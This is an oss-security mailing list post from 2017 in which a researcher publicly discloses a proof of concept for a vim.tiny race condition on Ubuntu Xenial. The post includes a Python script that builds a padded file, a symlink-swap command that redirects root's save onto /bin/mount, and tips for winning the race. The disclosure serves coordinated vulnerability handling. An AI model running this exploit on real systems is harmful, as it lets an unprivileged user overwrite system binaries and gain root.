oss-sec mailing list archives
AW: Security risk of server side text editing in general and vim.tiny specifically
From: Fiedler Roman <Roman.Fiedler () ait ac at>
Date: Mon, 13 Nov 2017 15:10:25 +0000
Hello Alexander,
Von: Solar Designer [mailto:solar () openwall com] On Fri, Nov 03, 2017 at 11:07:14AM +0000, Fiedler Roman wrote:PS: POC for vim.tiny on Ubuntu Xenial to overwrite arbitrary files as userroot when editing file in directory owned by other user is available on request, disclosure after one week or if list discussion indicates other timing. Please post this PoC in here ASAP. Right now, you're in violation of distros list policy for having posted the PoC in there yet not made it public on oss-security within 7 days after posting about the issue itself in here. Please correct this. (To me this is also an example of misuse of the distros list, and then of the ability to delay posting the PoC - creating administrative work for all of us out of thin air.)
Thanks for the reminder. here is the text from the original mail to your [vs]-list: PS: POC for Ubuntu Xenial to overwrite /bin/mount with custom content by creating a x.txt as another user (e.g. www-data) and having root edit it using vim.tiny. Of course attacker would restore everything to normal afterwards (omitted). On multicore machines, the race is not always won, for testing purposes you can strace vim (making it slower) or add other machine load, e.g " (cat /dev/zero | md5sum) &" as www-data. With strace, chance is nearly 100% to replace /bin/mount with x.txt (including mode, ownership). With 24 md5sum on a 4 core machine, chance is > 80% to make /bin/mount world writable, otherwise also replacing the content, changing ownership. * Create a rogue file of same size as user www-data: In real world attack, attack would pad a file writeable by him to same size as a system library, essential binary using spaces or newlines at the end of the file. For demo, newlines only will do. #!/usr/bin/python3 -BEsStt import os mountSize = os.stat('/bin/mount').st_size targetFileName = 'x.txt' targetFile = open(targetFileName, 'wb') targetFile.write(b'\n' * mountSize) targetFile.close() os.chmod(targetFileName, 0o777) * Use tool from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=602333 to replace with symlink. Start it as www-data after root started "vim.tiny x.txt" but before saving file as root. ./DirModifyInotify --Watch x.txt --MovePath x.txt --LinkTarget /bin/mount --WatchCount 0
Attachment:
smime.p7s
Description:
Current thread:
- Re: Security risk of server side text editing in general and vim.tiny specifically, (continued)
- Re: Security risk of server side text editing in general and vim.tiny specifically Jakub Wilk (Nov 03)
- Re: Security risk of server side text editing in general and vim.tiny specifically Solar Designer (Nov 03)
- Re: Security risk of server side text editing in general and vim.tiny specifically Ian Zimmerman (Nov 03)
- nvi crash recovery (was Re: [oss-security] Re: Security risk of server side text editing in general and vim.tiny specifically) Hanno Böck (Nov 03)
- Re: nvi crash recovery Jakub Wilk (Nov 03)
- Re: nvi crash recovery Jakub Wilk (Nov 04)
- Re: nvi crash recovery (was Re: [oss-security] Re: Security risk of server side text editing in general and vim.tiny specifically) Daniel Micay (Nov 03)
- nvi crash recovery (was Re: [oss-security] Re: Security risk of server side text editing in general and vim.tiny specifically) Hanno Böck (Nov 03)
- Re: Re: Security risk of server side text editing in general and vim.tiny specifically Christos Zoulas (Nov 03)
- AW: Re: Security risk of server side text editing in general and vim.tiny specifically Fiedler Roman (Nov 06)
- Re: Security risk of server side text editing in general and vim.tiny specifically Solar Designer (Nov 13)
- AW: Security risk of server side text editing in general and vim.tiny specifically Fiedler Roman (Nov 13)
- Re: Security risk of server side text editing in general and vim.tiny specifically Fiedler Roman (Nov 03)
- Re: Security risk of server side text editing in general and vim.tiny specifically Fiedler Roman (Nov 03)
- Re: Security risk of server side text editing in general and vim.tiny specifically Solar Designer (Nov 03)
- Re: Security risk of server side text editing in general and vim.tiny specifically Solar Designer (Nov 03)
- Re: Security risk of server side text editing in general and vim.tiny specifically Leonid Isaev (Nov 05)
- Re: Security risk of server side text editing in general and vim.tiny specifically Solar Designer (Nov 03)